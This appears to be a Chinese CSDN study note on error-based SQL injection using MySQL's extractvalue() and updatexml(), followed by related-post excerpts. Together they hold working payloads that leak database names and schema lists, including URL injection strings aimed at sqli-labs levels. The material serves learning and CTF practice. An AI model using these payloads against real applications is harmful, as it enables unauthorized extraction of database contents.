学习基于extractvalue()和updatexml()的报错注入

最新推荐文章于 2025-03-18 11:15:09 发布
最新推荐文章于 2025-03-18 11:15:09 发布
阅读量5.1w 收藏 131
点赞数 50
分类专栏: ctf 学习笔记 web安全 文章标签: 学习笔记 小白 sql报错注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zpy1998zpy/article/details/80631036
版权

extractvalue()

extractvalue() :对XML文档进行查询的函数

其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样

语法:extractvalue(目标xml文档,xml路径)

第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容。

正常查询 第二个参数的位置格式 为 /xxx/xx/xx/xx ,即使查询不到也不会报错

select username from security.user where id=1 and (extractvalue(‘anything’,’/x/xx’))


使用concat()拼接 ‘  /  ‘ 效果相同,

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘/’,(select database()))))

这里在’anything’中查询不到 位置是 /database()的内容,

但也没有语法错误,不会报错,下面故意写入语法错误:

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘~’,(select database()))))

可以看出,以~开头的内容不是xml格式的语法,报错,但是会显示无法识别的内容是什么,这样就达到了目的。

有一点需要注意,extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位

这里查询前5位示意:

select username from security.user where id=1 and (extractvalue(‘anything’,concat(‘#’,substring(hex((select database())),1,5))))


updatexml()

updatexml()函数与extractvalue()类似,是更新xml文档的函数。

语法updatexml(目标xml文档,xml路径,更新的内容)

select username from security.user where id=1 and (updatexml(‘anything’,’/xx/xx’,’anything’))


报错方式相同:

select username from security.user where id=1 and (updatexml(‘anything’,concat(‘~’,(select database())),’anything’))

同样是32位查询。

转载指明出处

文章同步到我的博客: http://119.23.249.120/archives/256
24-3 SQl 注入 - 利用报错函数updatexml及extracevalue
weixin_43263566的博客
02-11 1501
改变文档中符合条件的节点,使用不同的 XML 标记匹配替换 XML 块的函数。:String 格式,为 XML 文档对象的名称。:XPath 格式的字符串,代表路径。new_value:String 格式,用于替换查找到的符合条件的数据。通过提供一个 XML 标记片段 XPath 表达式,从 XML 文档中提取值的函数。xml_frag:XML 标记片段,即 XML 文档对象。xpath_expr:XPath 表达式,用于定位需要提取的值。
SQL注入报错注入
qq_45557130的博客
10-07 635
sql注入报错注入
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
EXTRACTVALUE函数提取大文本XML数据
u010446835的博客
06-20 841
从XML类型的数据中提取特定的XML元素或属性的文本内容
iwebsec-updatexml报错注入
最新发布
m0_60984906的博客
03-18 464
iwebsec靶场sql注入updatexml报错注入
MYSQL updatexml()函数报错注入解析
09-09
主要介绍了MYSQL updatexml()函数报错注入解析,并且简单介绍了updatexml函数,具有一定参考价值,需要的朋友可以了解下。
SQL注入,xpath函数updatexml()extractvalue()报错注入原理
金 帛的博客
04-26 4549
SQL注入报错注入原理
报错注入extractvalue,updatexml)
m0_73477772的博客
05-10 554
但是我们将第二个参数的斜杠替换为另外的符号extractvalue(doc,'~book/author/surname')例如:concat(1,2)的作用是将1,2两个位置的数据拼接起来,0x7e是’~‘的ascll码。这时候我们在第二个参数的位置加入SQL语句,则会返回我们想要的信息。第三个参数:new_value,string格式,替换查找到的符合条件的数据。第一个参数doc XML文档对象名称,第二个参数'____' 路径。如果我们把第二个参数的路径拼写错误,它会查不到内容但不会报错
学习笔记 UpdateXml() MYSQL显错注入
weixin_33849215的博客
12-28 615
学习之前,需要先了解UpdateXml()UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参数:new_value,S...
SQL注入系列篇 | 报错注入
d59hao的博客
05-05 1055
报错注入是通过构造恶意SQL,使数据库报错,从报错信息中得到敏感信息的方法。如果服务器应用没有对这种错误进行处理,则攻击者可以通过页面的错误回显获取数据。
update.xml
07-07
软件更新升级 <?xml version="1.0" encoding="utf-8" ?> <Update> <Soft Name="BlogWriter"> <Verson>1.0.1.2</Verson> <DownLoad>http://www.csdn.net/BlogWrite.rar</DownLoad> </Soft> </Update>
SQL注入报错注入
qq_68163788的博客
01-27 3116
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
updatexml()函数
m0_74037729的博客
04-09 386
1.XLM_document:是一个XML类型的属性名或表达式。2.XPath_string:指定要更新的节点路径。作用:用于更新 XML 类型的列中的 XML 数据。3.new_value:新值,用于替换匹配的节点。
updatexml函数
m0_62092622的博客
01-27 9588
先介绍一下updatexml函数 UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串) 第三个参数:new_value,String格式,替换查找到的符合条件的数据 以sql-labs第十七关为例 由于本关username过滤比较严格,所以password就成了注入点 根据报错来获取所需要的信...
mysql xml函数_MYSQL updatexml()函数报错注入解析
weixin_42188533的博客
02-27 1271
MYSQL updatexml()函数报错注入解析首先了解下updatexml()函数UPDATEXML (XML_document, XPath_string, new_value);第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。第三个参...
sqli-labs】Less 5——报错注入updatexml()函数)
用博客做做记录的小白
06-23 2804
sqli-labs靶场第五关less 5,使用报错注入函数updatexml()进行报错注入注入类型为单引号字符型。
updatexml mysql_深入浅出带你玩转sqlilabs(四)-updatexml(),floor(),extractvalue()报错注入
weixin_39942108的博客
01-30 569
SQL各种参数类型下的注入测试数字型-sqlilabs less2前面文章已演示过字符型-sqlilabs less1前面文章已演示过搜索型-自写测试如:www.test.com/index.php?id=1www.test.com/index.php?id=abc(搜索型,一般产生在网站的搜索框)http://www.test.com/search.php?q=1区分参数类型的原因:当参数类型为...
SQL报错注入原理-详细讲解 extractvalue()updatexml()、floor()报错原因
大大大蜜蜂的博客
10-12 6359
SQL报错注入原理 一、xpath语法格式错误的报错: mysql5.1.5版本中添加了extractvalue()updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQLextractvalue()updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
基于phpstudy 搭建sqllib靶场,使用union注入完成less1、less2 分别使用ex()报错floor()报错注入完成less-5、使用updatexml()报错完成关卡less-6
09-07
基于phpstudy搭建sqllib靶场是一个利用phpstudy软件sql-1ib靶场环境来学习练习SQL注入技术的过程。这里提供一个大致的步骤指南,但请注意,进行SQL注入实验应在合法的测试环境中进行,避免进行非法的渗透测试。 1. 安装phpstudy软件,并启动服务。 2. 下载sqllib靶场,根据其文档或说明文件进行安装配置。 3. 配置好靶场后,启动web服务。 接下来,我们将针对不同的关卡介绍如何使用不同的SQL注入技术: **less1 less2 (使用extract()函数报错注入)** 1. 找到可能存在SQL注入的输入点,例如表单提交或URL参数。 2. 尝试注入一些基本的SQL注入代码,比如单引号(')来检查是否存在SQL注入漏洞。 3. 如果存在注入点,使用extract()函数配合双写技术来触发报错。例如,如果id参数可控,可以尝试如下的URL: ``` ?id=1' union select 1, extractvalue(1,concat(0x7e,database()))# ?id=1' union select 1, extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)))# ``` **less-5 (使用floor()函数报错注入)** 1. 同样找到可能存在SQL注入的输入点。 2. 使用floor()函数一些技巧来构造报错注入。例如: ``` ?id=1' and floor(rand(0) * (select group_concat(schema_name) from information_schema.schemata))# ``` **less-6 (使用updatexml()函数报错注入)** 1. 确定可以注入的点。 2. 利用updatexml()函数来触发报错。例如: ``` ?id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1)# ```
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值